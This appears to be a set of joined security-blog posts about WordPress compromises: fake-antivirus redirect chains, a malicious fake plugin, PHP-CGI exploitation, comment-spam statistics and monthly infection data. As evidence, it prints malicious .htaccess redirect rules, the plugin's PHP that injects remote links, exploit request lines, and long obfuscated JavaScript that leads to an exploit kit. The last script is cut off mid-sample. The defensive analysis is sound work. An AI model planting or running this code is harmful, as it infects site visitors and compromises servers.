What is going on?

Once a site gets compromised, the .htaccess file gets modified to redirect users running Windows and coming from search engines to some russian sites:

http://colceadem.ru/infinity?8 OR
http://ademcolce.ru/infinity?8 OR
http://tradeincas.ru/siga?7 OR many others

Which then redirects the user to some intermediate sites (also .ru):

http://vocecolce.ru/subcribe/comment.php OR
http://digi-mote.ru/remote/disk.php OR
http://golfadam.ru/snack/nyam.php OR many others

Which at the end does the last redirection to some .info domains where the Fake AV is actually pushed to the user:

http://detectionperfomancekeep.info/25182cbe2ec9db38/0/

http://securityriskslow.info/dfa1c45eb8c092e7/0/

http://reliabilitysaverhigh.info/dfa1c45eb8c092e7/0/

http://systempckeeper.info/dfa1c45eb8c092e7/0/

That’s the pretty message the user gets:

Technical details

That’s the usual flow we are seeing loaded on the client side:

http://colceadem.ru/infinity?8 ->
http://vocecolce.ru/subcribe/comment.php ->
http://preventioncontrolpc.info/dfa1c45eb8c092e7/0/ (176.53.20.58)

OR

http://ademcolce.ru/infinity?8

http://incashilton.ru/magma/plaz.php ->
http://fail-safetydebugfirewall.info/dfa1c45eb8c092e7/0/ (176.53.20.58)

OR

http://tradeincas.ru/siga?7 ( 79.137.214.17) ->
http://erastyx.ru/imba/imdb.php (79.137.214.17) ->
http://reliabilitysaverhigh.info/dfa1c45eb8c092e7/0/ (176.53.20.58)

OR (a bit unusual, but happening)

http://mygooglemy.com (195.248.234.35) ->
http://detectionperfomancekeep.info/25182cbe2ec9db38/0/ (176.53.20.58)

But note that the domains change very often (a few times daily) and are registered daily by random names/addresses (just do a whois on any of those to verify).

This are all the domains we detected so far:

http://centerprocessesremedy.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://defendercenterthreat.info/dfa1c45eb8c092e7/0/ (184.22.206.52)
http://fail-safetydebugfirewall.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://fail-safetyperfomancecenter.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://firewalloptimizerguarantor.info/dfa1c45eb8c092e7/8/ (176.53.20.58)
http://onlinepreventionprotector.info/dfa1c45eb8c092e7/1/ (31.193.12.3)
http://optimizerfirewalltester.in/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://perfomanceprotectionmicrosoft.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://preventioncontrolpc.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://reliabilityinfectiondefender.info/dfa1c45eb8c092e7/1/ (176.53.20.58)
http://reliabilitysaverhigh.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://reliabilitysystemav.info/dfa1c45eb8c092e7/7/ (64.120.207.107)
http://remedysupervisionshield.info/dfa1c45eb8c092e7/0/ (31.193.12.3)
http://securityriskslow.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://securityriskslow.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://shieldavpc.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://systempckeeper.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://testingwormskeeper.info/dfa1c45eb8c092e7/0/ (176.53.20.58)
http://vulnerabilitydelivererantivirus.info/dfa1c45eb8c092e7/30/ (204.45.111.35)
http://windowsverifydefend.info/dfa1c45eb8c092e7/0/ (176.53.20.58)

http://day-one.ru/infinity?8 (79.137.214.17)
http://preez-beonce.ru/display/shew.php (79.137.214.17)
http://beoncemay.ru/infinity?8 (79.137.214.17)
http://beonce-preez.ru/infinity?8 (79.137.214.17)
http://colce-voce.ru/xtra/setting.php (79.137.214.17)
http://may-preez.ru/infinity?8 (79.137.214.17)
http://vocecolce.ru/subcribe/comment.php (79.137.214.17)
http://colce.ru/infinity?8 (79.137.214.17)
http://vocecolce.ru/subcribe/comment.php (79.137.214.17)
http://colceadem.ru/infinity?8 (79.137.214.17)
http://digi-mote.ru/remote/disk.php (79.137.214.17)
http://ademcolce.ru/infinity?8 (79.137.214.17)
http://digi-mote.ru/remote/disk.php (79.137.214.17)
http://ademvoce.ru/herz?8 (79.137.214.17)
http://motedigi.ru/carlos/dam.php (79.137.214.17)
http://digi-client.ru/herz?8 (79.137.214.17)
http://golfadam.ru/snack/nyam.php (79.137.214.17)
http://hilton-trade.ru/siga?7 (79.137.214.17)
http://incashilton.ru/magma/plaz.php (79.137.214.17)
http://trade-hilton.ru/siga?7 (79.137.214.17)
http://erastyx.ru/imba/imdb.php (79.137.214.17)
http://tradeincas.ru/siga?7 (79.137.214.17)

And that’s just one small sample, since they keep changing.

How are sites getting hacked?

Very good question. So far, we are seeing the same techniques as before: Looking for outdated WP installs, vulnerable plugins and timthumb.php (yes, some people are still using the old/vulnerable version of timthumb).

This is a common scanner looking for vulnerable timthumb:

207.58.169.51 – - [15/May/2012:18:33:22 +0000] “GET //wp-content/themes/TheStyle/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1″ 404 307 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6″

164.177.155.35 – - [15/May/2012:18:28:02 +0000] “GET /scanner//wp-content/themes/scarlett/?src=http://wordpress.com.airatrip.com/temp/dapetsatu.php HTTP/1.1″ 404 304 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6″

And when they find a way in, they add the following .htaccess to the hacked site:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|
netscape|aol|hotbot|goto|infoseek|mamma|..
RewriteRule ^(.*)$ http://tradeincas.ru/siga?7 [R=301,L]

In addition to many backdoors that help they maintain access to it. You can do a real time scan of your site here to see if it is compromised: http://sitecheck.sucuri.net.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.

Plugin Directory Message

We wrote a post this week bringing some attention to the spammy actions of a website named WPStats.org and their fake Advanced Search Plugin. As of this morning, when trying to access the Advanced Search plugin page in the WordPress plugin directory you get the following message:

In the message they have officially stated that the plugin was never in the repository, we stand corrected! Here is a quote from the official response:

We rejected the plugin when it was submitted to the WordPress.org plugin directory. However, it seems the same code was offered for download elsewhere, which has resulted in sites infected with spam.

A warning was added to the Advanced Search plugin page along with a link to a clean version of the plugin.

The cool take away here is that this can be done for any plugin that’s in the directory. It could offer a mechanism for users to take action if a vulnerability is discovered.

We often talk about community efforts, I think this could be very helpful, and it’s great to see it coming from WordPress.org.

Plugin Updates

Another process coming to life looks to be removal of offending plugins. Below is the process that will occur when a plugin is deemed unsafe and may cause harm to your site and visitors:

1. Plugin Review

Plugin is reviewed and deemed unsafe – critical vulnerabilities where the author is not responsive, or malicious plugins. Vulnerabilities that are or can be actively exploited. This starts the process.

2. Notification Process

On WordPress.org, the code is blanked out, a message is added, and a new update is forced. WordPress dashboards are notified of an available update.

Update available:

Plugin description:

3. Plugin Updates

Upon updating, the code from the offending plugin is then blanked out from the WordPress installation.

If the plugin is readded to the website, the update message will reappear and then deactivate itself.

In the end, it looks like WordPress is experimenting with ways to take a stronger stance on offending code trying to infiltrate self installed instances of WordPress. It truly is a team effort, and it’s great to see them thinking through viable options to responsibly approaching security.

What’s your take? Let us know your thoughts on the new alerting and removal process that looks to be live as of today.

“Awesome site. Great job”

“You should take part in a contest for one of the best blogs on the web. I will recommend this site!”

I know you like flattering comments on your website. And I know you love to see many comments on each one of your posts (say you community participation). Who doesn’t, right? We love them too.

So we decided to take a closer look at the last 100,000 (well, 98,238 to be more exact) comments that were sent to the network of sites that we are monitoring. How much of them are spam? Who are the most annoying spammers? And things like that.

Comment Analysis

We filtered the latest 98,238 comments received (that’s less than a week worth of comments), and ran them through our analysis engine. Guess how many of them were spam? How many were good?

• Spam comments: 79,858 (81.2%)
• Good comments: 18,380 (18.8%)

Wow! So according to our analysis, more than 80% of the comments were classified as spam. We even took a conservative approach and classified unsure comments as good comments. So out of every 5 comments received, only 1 was valid.

*Unsure comments were ones we only saw hitting one web site, but the content was suspicious. Those in this list were almost 10,000 (9% of the overall total). If we had classified those as spam, the number would have grown to 90+% spam.

Spam Analysis – Messages

This really amused us. What type of message do you think a spammer was sending? Most of the time, we noticed that they sent a flattering note to increase the odds of the webmaster accepting the comment. Here are the top 10 messages sent by spammers:

238 sites, comment => Thank you very much!        

213 sites, comment => awesome site. Great job

191 sites, comment => Nice blog, thanks for the info.

186 sites, comment => Your website is really good!

172 sites, comment => Webmaster, I am the admin at SEOPlugins.org.  We
 profile SEO Plugins for WordPress blogs for on-site and off-site SEO.  I'd like to invite you to check out our recent profile for a pretty amazing plugin which can double or triple traffic for a Worpdress blog and we just posted  a video showing the plugin in action.  You can delete this comment, I didn\'t want to comment on your blog, just wanted to drop you a personal message.  Thanks,  Rich

144 sites, comment => Yup, you know it-, just like I've been saying.

137 sites,  comment => Louis Vuitton Shoes Ankle Boot

123 sites,  comment => Buy Viagra Online 

108 sites, comment => You made some decent points there. I looked on the internet for the issue and found most individuals will go along with with your website.

106 sites, comment => You should take part in a contest for one of the best blogs on the web. I will recommend this site!

The last one in the list is the funniest (“You should take part in a contest for one of the best blogs on the web. I will recommend this site”). Taking out the Viagra and the Louis Vuitton spam, why do they do it?

They do it because in the URL field, they add a link to their own web site (which can increase their page rankings, visitors, etc). Example:

[author] => Mary Jane
[email] => info@fabfunapps.com
[url] => http://fabfunapps.com
[comment] => Good share! I hope more people will discover your blog because you really know what you’re talking about. Can’t wait to read more from you

Spam Analysis – Emails

This email analysis was not as useful as we would have hoped. The emails are very random and mostly from gmail and hotmail accounts. These were the top spammer emails:

470 [email] => ofangjiancong@gmail.com
222 [email] => colorado@uymail.com
175 [email] => nhaofangjiancong@gmail.com
172 [email] => Rich@seoplugins.org
167 [email] => n9zvrx.dzpbhniuvb@gmail.com
161 [email] => imtheking@hotmail.com
136 [email] => euq.wxtzlrl17fvbx@gmail.com
133 [email] => crearlynaxzex@gmail.com
132 [email] => alms5eg.m0352vbi3@gmail.com
129 [email] => io6llx3za08izklw@gmail.com
123 [email] => mc.1e0l033z.fbr13z@gmail.com
121 [email] => gr794g4ci1a.bhcju@gmail.com
120 [email] => www.realcazinoz.com@gmail.com
120 [email] => hn.58gmso.jvbhxz36@gmail.com
120 [email] => 18ag5yfa46.io0ll2@gmail.com
115 [email] => plm.n5fqls79vmrop@gmail.com
115 [email] => ofawc5j0lhd9uab.8@gmail.com
113 [email] => yoagxxtp4mciouqx@gmail.com

These were the top domains used by spammers:

16514 gmail.com
7300 hotmail.com
3267 yahoo.com
2309 aol.com
2038 gmail.com
1066 googlemail.com
984 gnumail.com
954 123mail.net
950 yahoomail.com
443 ymail.com
349 yahoo.co.uk
261 cwcom.net
219 live.com
202 magicmail.com
197 mail.com
192 Gmail.com
180 mail.ru
160 msn.com

Spam Analysis – URLs

Now it is getting useful, let’s see the domains that are using comment spam to increase their ratings and visitors. Top 30 on this one (out of 24,976 different URLs):

1163 [url] => http://www.kitsucesso.com
1114 [url] => http://www.listasegmentada.com
677 [url] => http://stevepavlina.com
481 [url] => http://afriendshipquotes.blogspot.com/p/poem-for-best-friends.html
344 [url] => http://online-viagra-online.com
332 [url] => http://movie-web.org
317 [url] => http://www.divulgaemail.com
314 [url] => http://www.linklegends.com/free-trial
254 [url] => http://earn7800permonth.com
225 [url] => http://www.tvturn.com
208 [url] => http://www.zimbio.com/General/articles/-rEPnqoftf3/live+stream+TV+personal?add=True
208 [url] => http://www.filpan.ru
202 [url] => http://www.prlog.org/11261550-phone-number-lookup-catch-cheater-quickly.html
197 [url] => http://filter-paper.net
193 [url] => http://lnklicious.com
190 [url] => http://www.listadeemail.org
187 [url] => http://www.wordpress-subscribers.info
187 [url] => http://onlinepharmacy-levitra.com
179 [url] => http://eng.umek.su
172 [url] => http://www.seoplugins.org
167 [url] => http://5millionebooks.com
161 [url] => http://whatwhatwhat.com/
150 [url] => http://www.pharmacyreviewer.com/
146 [url] => http://www.japancoachstores.com/
144 [url] => http://www.guccibagoutletjp.com/
132 [url] => http://rsproductsonline.com/
129 [url] => http://diablo-3-for-free.com/review/diablo-3/
127 [url] => http://terbelizzder.com
126 [url] => http://www.cialis.vc

Spam Analysis – IP Addresses

To finish, some actionable information for hosting providers and website owners. This is the list of IP addresses sending the most spam so you can block them out:

296 62.75.181.210
238 216.59.22.16
238 188.138.84.93
227 66.85.128.34
182 204.12.237.43
166 204.45.108.226
162 37.59.151.187
161 37.59.173.137
129 178.32.151.208
126 37.59.151.182
119 91.201.64.4
113 178.137.160.195
107 192.162.102.221
104 83.136.86.21
104 83.136.86.105
101 78.112.161.207
100 178.32.201.178
93 94.153.9.47
92 109.73.77.149
91 94.45.168.67
90 91.207.8.26
84 80.84.51.194
83 91.210.104.143
80 69.194.161.228
79 83.22.254.204
78 75.35.174.45
73 120.62.1.232
71 120.62.1.174
69 91.236.74.133
68 71.21.19.133
68 63.141.237.224
68 210.192.65.242
66 120.62.16.89
65 74.108.93.214

The total list is very big (12,190 unique IP addresses), but blocking the top ones is a good start.

Spam Analysis – Countries

Out of curiosity we decided to check the top Countries sending spam (based on the IP address):

23,899 United States (31%)
16,888 China (22%)
5,145 Russian Federation (6.7%)
3,291 Brazil (4.3%)
3,094 France (4.0%)
2,850 Germany (3.7%)

In the olympics of SPAM, the USA is #1, followed by China (Silver), Russia (Bronze) and Brazil.

Conclusion

Yes, there is a lot of spam out there. I would say that 9 out of 10 comments are spammy in some way (even if not automated – we only classified automated messages as spam). In any event, let us know if you want any more information from this list. We have raw data, so we can run numbers and different analysis as requested.

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

The plugin

What is more interesting is that they also have a fake plugin called “advanced-search-plugin” that includes those hidden links and a call back to wpstats.org. The plugin does nothing of what is advertised (advanced search), and is just being used to attract attention to get it installed.

Part of the plugin:

/*
Plugin Name: Advanced Search
Plugin URI: http://searchpluginwp.blogspot.com/
Description: Add a Google style search to your blog where suggestions are made for tags, categories and titles.
Author: Jessica devon
Version: 2.1.2
Author URI: http://searchpluginwp.blogspot.com/

*/
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();
$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);curl_close($ch);echo $data;}}
add_action(‘wp_head’, ‘insert_jquery_theme’);}

If you have this plugin installed, delete it ASAP! Sucuri SiteCheck should be able to identify those hidden spam links if your site is compromised.

Guidance includes updating your .htaccess file with the following:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? – [F,L]

It is important to note however that if you are on WordPress and currently using our Free security plugin you are protected. We are actively seeing the attack across our growing network of plugin users and proactively pushing changes to protect our users.

What’s great about this is that its independent of what your host does. You can rest easy knowing that we’ve got your back.

Not Familiar With our Free Security Plugin?

You can find more information on the specifics by reading our Preventive page. The Security plugin is a new feature that we have recently released for free to all our WordPress clients.

Well, it didn’t take long. Since the weekend, we started to see scanners looking for that vulnerability on our servers and honeypots. And now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we noticed that the attack starts in two ways, either by checking if the server is vulnerable using the ?-s option (which shows the source of the page):

88.198.51.36 – - [06/May/2012:07:51:36 -0400] “GET /index.php?-s HTTP/1.1″ 301

Or by including the content of the PHP input (or of an external shell):

84.247.61.27 – - [07/May/2012:17:16:58 -0400] “POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1″ 301 – “-” “-”

If the attacker succeeds, it will upload a backdoor to the compromised site in a random location of the file system and use that to continue exploiting the server.

It is also important to note that even though we are only seeing those two “flags” being used (-s and -d), php-cgi has many options and any of them can be used:

$ php-cgi -h
-a Run interactively
-b
| Bind Path for external FASTCGI Server mode
-C Do not chdir to the script’s directory
-c | Look for php.ini file in this directory
-n No php.ini file will be used
-d foo[=bar] Define INI entry foo with value ‘bar’
-e Generate extended information for debugger/profiler
-f Parse . Implies `-q’
-h This help
-i PHP information
-l Syntax check only (lint)
-m Show compiled in modules
-q Quiet-mode. Suppress HTTP Header output.
-s Display colour syntax highlighted source.
-v Version number
-w Display source with stripped comments and whitespace.
-z Load Zend extension .
-T Measure execution time of script repeated times.

Attacker IP addresses

Via our honeypots, we detected the following IP addresses trying to exploit this vulnerability:

# [Number of hits] [IP Address]
191 85.114.141.40
120 91.224.160.132
44 84.247.61.27
32 94.242.199.77
18 91.227.142.126
10 80.244.248.70
7 88.228.101.221
5 190.245.104.190
5 88.228.104.94
5 88.228.114.235
3 71.163.209.143
2 177.8.168.3
2 88.228.122.158
2 190.44.25.254
2 88.198.51.36
1 91.77.240.51

And this number is probably going to grow even more.

Protecting yourself

The PHP guys are recommending the following .htaccess hack to block those attacks:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? – [F,L]

But the best option is to update PHP ASAP (a fix is available for it already), or stop using the CGI setup and move to to the PHP module (if using Apache), or Fast CGI.

More details to come!

Update 1:
*Facebook is playing with this vulnerability and added the following job link on their page: https://facebook.com/?-s (for anyone that is probing for this):

include_once ‘https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS’;

1. Iframe injection: It makes the browser loads content from external (and malicious web sites). Example: <iframe src="http://pokosa.com/tds/go.php?sid=1" ..
2. Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes. Example: <script>d= Date ;d=new d();h=-parseInt("012")/5;if(window.document)try{new document.getElementById(“qwe”)…. (this code redirects users to the blackhole exploit kit)
3. .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or specific user agents/ referers) to malware or spam content.
4. Blackhat SEO spam: It is not really malware in the sense of the word (since it won’t infect anyone visiting the site), but it is still harmful for the webmaster and the site’s reputation (imagine a corporate site redirecting to a viagra  online  store).

April / 2012 stats

Last month ( April / 2012), we scanned a LOT of sites and many of them (107,616 to be more precise) were compromised. This is the breakdown per infection type:

• Iframe injection: 52.6%
• Javascript injection: 26.5%
• Blackhat SEO spam: 10.1%
• .htaccess redirections: 7.3%
• Other: 3%

Top malware domains per infection type and unique number of compromised sites

HTaccess

315 http://googlesgo.com.
105 http://jamkim.ru/in.cgi?4.
96 http://tro-pas.ru/in.cgi?4.
81 http://kim-vus.ru/in.cgi?4.
79 http://froling.bee.pl/.
77 http://www.fdvrerefrr.ezua.com/.
76 http://gafa-senda.ru/in.cgi?4.
74 http://namesti.bee.pl/.
69 http://vaclavska.bee.pl/.
68 http://stecdon.ru/example/status.php.
68 http://era-was.ru/in.cgi?4.
66 http://mod-sys.ru/acu?11.
62 http://kimvus.ru/in.cgi?4.
61 http://feat-container.ru/flayer?12.
61 http://acro-mini.ru/flayer?12.
59 http://vus-kim.ru/in.cgi?4.
59 http://sas-air.ru/space?7.
57 http://costabrava.bee.pl/.
56 http://mma-ga.ru/indigo?5.
55 http://jam-vus.ru/in.cgi?4.
53 http://wasera.ru/in.cgi?4.
53 http://jamvus.ru/in.cgi?4.
53 http://control-check.ru/flayer?12.
52 http://jam-kim.ru/in.cgi?4.
49 http://tropas.ru/in.cgi?4.
47 http://javlam.ru/in.cgi?5.
47 http://bysteb.ru/flayer?12.
46 http://pas-tro.ru/in.cgi?4.
46 http://gafasenda.ru/in.cgi?4.
46 http://gabplat.ru/in.cgi?4.

Iframes

3368 http://recovery-hdd.eu/in.cgi?6″
2298 http://almazzao-co.eu/in.cgi?6″
690 http://smuss.net/redirect.php”
523 http://geocacherzone.pt/mediamarkt/images/.tyt/.unzushlagen/sys/index.php”
519 http://sluxxqqgykewolmoli.in/in.cgi?default”
487 http://xxx.velery.in/images.php?t=44443094″
401 http://pokosa.com/tds/go.php?sid=1″
369 http://xsw.vedeved.in/images.php?t=44443094″
362 http://csepros.com”
319 http://sdc.hdljca.in/images.php?t=44443094″
313 http://sgh.nolerit.in/images.php?t=44443094″
302 http://wqx.nerolit.in/images.php?t=44443094″
295 http://niijz.hoahoc.org/images.php?t=44443094″
259 http://cds.zdcwzn.in/images.php?t=44443094″
257 http://tfa.gdasasa.in/images.php?t=44443094″
249 http://xxx.fedorita.in/images.php?t=44443094″
238 http://windowsflashmx.rr.nu/iframe.php?id=535″
225 http://vgdhr.us.to/images.php?t=44443094″
212 http://xxx.germiss.in/images.php?t=44443094″
200 http://sds.valerito.in/images.php?t=44443094″
194 http://65.126.238.126/scrp.php”
190 http://fwhhrx.baerika.in/images.php?t=44443094″
189 http://usf.haderut.in/images.php?t=44443094″
187 http://hga.adcxhg.in/images.php?t=44443094″
179 http://wajci.dnepr.com/images.php?t=44443094″

Encoded javascript:

Most of those encoded javascript malware we found, were being used to redirect to exploit kits (specially the Blackhole one).

    784 <script>i=0;try{prototype;}catch(egewgsd){if(window.document)f
=["-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k
60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k
0k82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60
k67k74k60k-9k82k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k
60k-1k-7k19k64k61k73k56k68k60k-9k74k73k58k20k-2k63k75k75k71k17k6k6k67k
70k65k74k60k76k77k5k73k76k6k58k70k76k69k75k8k12k5k71k63k71k-2k-9k78k64
k59k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k80k6
7k60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70
k74k64k75k64k70k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k7
5k70k71k17k7k18k-2k21k19k6k64k61k73k56k68k60k21k-7k0k18k-28k-32k-32k84
k-28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73k56k68k60k73k-1k0k82k-
28k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k58k73
k60k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5
k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k7
1k17k6k6k67k70k65k74k60k76k77k5k73k76k6k58k70k76k69k75k8k12k5k71k63k71
k-2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k64k67k64k75k80k20k-2k63k
64k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70k69k20k
-2k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k
-2k7k-2k18k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k
24k75k75k73k64k57k76k75k60k-1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61
k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k63k60k64k62k63k75k-2k3k-2
k8k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k75k28k67k
60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50
k7k52k5k56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84"][0
].split("k");v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;5
67!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)
e(s);</script>
    775 <script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)
try{new String("asd").prototype.q}catch(egewgsd){f=["-30i-30i66i63i-7i
1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i
58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i
63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-
30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70
i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i67i58i83i83i78i77i62i7i75i78i8
i60i72i78i71i77i14i7i73i65i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62
i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i6
6i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72
i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i7
5i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i
71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22
i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1
i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1
i0i76i75i60i0i5i0i65i77i77i73i19i8i8i67i58i83i83i78i77i62i7i75i78i8i60
i72i78i71i77i14i7i73i65i73i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59
i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i7
2i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69
i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i
20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i1
0i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65
i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i
77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i
0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i8
6"][0].split("i");v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(
;565!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}if(f)z=s;e(z);</
script>
    642 <script>d=Date;d=new d();h=-parseInt("012")/5;if(window.docume
nt)try{new document.getElementById("qwe").prototype}catch(qqq){st=Stri
ng;zz="al";zz="v"+zz;ss="";if(1){f="f"+"r"+"o"+"m"+"Ch"+"ar";f=f+"C"+"
od"+"e";}e=this[f.substr(11)+zz];t="y";}n="3.5~3.5~51.5~50~15~19~49~54
.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54
~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.
5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.
5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5
.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49
.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~
57~55~28~22.5~22.5~50~56~49.5~56.5~51~57~49~56.5~22~51.5~54~22.5~51.5~
54~22~48.5~50.5~51.5~30.5~27.5~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23
.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~5
7~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~
51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~4
8~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~2
8~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.
5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~
56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~
29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5
~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~1
9.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5
~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~50~56~49.5~56.5~51
~57~49~56.5~22~51.5~54~22.5~51.5~54~22~48.5~50.5~51.5~30.5~27.5~18.5~1
9.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51
.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.
5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~
